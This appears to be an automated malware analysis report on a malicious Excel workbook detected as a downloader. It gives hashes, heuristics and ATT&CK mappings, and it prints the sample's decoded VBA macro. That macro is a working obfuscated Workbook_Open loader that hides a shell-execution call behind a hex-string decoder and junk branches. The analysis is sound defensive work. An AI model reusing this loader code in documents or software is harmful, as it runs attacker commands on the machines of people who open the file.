Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 97630f80d237046c…

MALICIOUS

Office (OLE)

30.0 KB Created: 2018-10-21 19:08:50 Authoring application: Microsoft Excel First seen: 2019-12-09
MD5: eccff077cc396dbf8c34d7d1f3531f96 SHA-1: 6f1299a7d94b5189e80e16a0616d7e4c2d29062f SHA-256: 97630f80d237046ccc994f18b0a46055e5eaec5ab7eeba7efa1af9621e261fdd
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains obfuscated VBA and XLM macros, including a Workbook_Open event, indicating it's designed to execute malicious code upon opening. The presence of 'CreateObject' and 'CallByName' calls, along with the ClamAV detection signature 'Xls.Downloader.Valyria-6934924-0', strongly suggests a downloader functionality. The obfuscated nature of the VBA code points to an attempt to evade detection.

Heuristics 8

  • ClamAV: Xls.Downloader.Valyria-6934924-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Valyria-6934924-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 228 bytes
SHA-256: 962aaf1d57f0a7207e98bd37b3a4cfa339dc6a87bd287090a5d69186204feb4a
Preview script
First 1,000 lines of the extracted script
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Top
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2929 bytes
SHA-256: 4836b116305e4b266c8b8c2ecd4f50b3b169589a889c9714955c46873ce446f6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function SDF_(ByVal OB_ As String)
Dim LQV_ As String: Dim NS_ As Long: For NS_ = 1 To Len(OB_) Step 2: LQV_ = LQV_ & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(OB_, NS_, 2)) - 10): Next: SDF_ = LQV_
End Function
Sub Workbook_Open()
Dim EXACCYAT_ As Long: EXACCYAT_ = 10
Dim GXJNMAV_ As Long
Select Case EXACCYAT_
Case 53 * Round(90 / 22 - 48) * 86 - (13 + 14) - 31 / Round(67 * 50 / 36) / 84
GXJNMAV_ = 5087 * 28
Case 85 * Round(53 / 21 - 42) * 26 * Round(18 / 86 - 58) * 31
GXJNMAV_ = 7590 * 51
Case 25 * Round(23 / 18 - 47) * 39 / Round(92 * 12 / 39) / 58
GXJNMAV_ = 2577 - 86
Case 60 * Round(51 / 19 - 61) * 42 + (31 - 45) + 36
GXJNMAV_ = 2413 + 55
Case 99 * Round(44 / 22 - 22) * 54 - (48 + 40) - 60 - (80 + 36) - 47
GXJNMAV_ = 4735 - 73
Case 94 / Round(45 * 16 / 30) / 66 / Round(27 * 12 / 68) / 34 + (9 - 47) + 81
GXJNMAV_ = 385 / 21
Case 61 / Round(64 * 9 / 14) / 33 + (68 - 90) + 97 - (76 + 14) - 32
GXJNMAV_ = 7780 * 22
Case 25 + (20 - 46) + 61 + (69 - 32) + 81 - (29 + 17) - 66
GXJNMAV_ = 3470 * 62
Case 99 * Round(33 / 62 - 70) * 76 + (99 - 52) + 88
GXJNMAV_ = 61 + 43
Case 68 / Round(17 * 98 / 67) / 25 + (56 - 96) + 66
GXJNMAV_ = 4318 + 59
Case 25 * Round(86 / 84 - 91) * 97 - (33 + 37) - 89
GXJNMAV_ = 2009 + 31
Case 74 * Round(77 / 10 - 76) * 45 * Round(22 / 79 - 38) * 15 - (37 + 42) - 84
GXJNMAV_ = 6800 + 84
Case 94 * Round(43 / 87 - 30) * 71 / Round(44 * 47 / 76) / 39 / Round(24 * 87 / 30) / 73
GXJNMAV_ = 7021 + 83
Case 75 * Round(97 / 44 - 70) * 55 / Round(11 * 75 / 82) / 50
GXJNMAV_ = 5022 / 87
Case 91 * Round(80 / 98 - 48) * 49 * Round(53 / 38 - 59) * 11 + (27 - 67) + 88
GXJNMAV_ = 6617 / 26
Case 73 - (23 + 20) - 74 * Round(82 / 46 - 92) * 35 * Round(95 / 10 - 21) * 57
GXJNMAV_ = 1228 + 45
Case 9 * Round(32 / 75 - 70) * 30 / Round(73 * 13 / 94) / 94 - (38 + 94) - 14
GXJNMAV_ = 4784 + 18
Case 31 * Round(87 / 56 - 25) * 26 / Round(36 * 54 / 37) / 25
GXJNMAV_ = 4274 / 11
Case 32 * Round(84 / 80 - 9) * 39 + (80 - 15) + 29 + (90 - 55) + 47
GXJNMAV_ = 352 / 73
Case 75 + (66 - 49) + 41 / Round(52 * 35 / 79) / 95 + (89 - 46) + 72
GXJNMAV_ = 4788 * 97
Case 98 - (35 + 46) - 69 * Round(74 / 27 - 86) * 35
GXJNMAV_ = 8668 * 22
Case 98 - (36 + 79) - 49 - (81 + 66) - 9
GXJNMAV_ = 3223 - 14
Case 38 * Round(28 / 23 - 95) * 48 / Round(60 * 60 / 17) / 63 / Round(79 * 59 / 21) / 58
GXJNMAV_ = 5909 + 27
Case Else: CallByName CreateObject(SDF_("615D6D7C737A7E385D726F7676")), SDF_("5C7F78"), VbMethod, SDF_(ThisWorkbook.Sheets("Tope").Range("G135").Value), 0, True
End Select
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.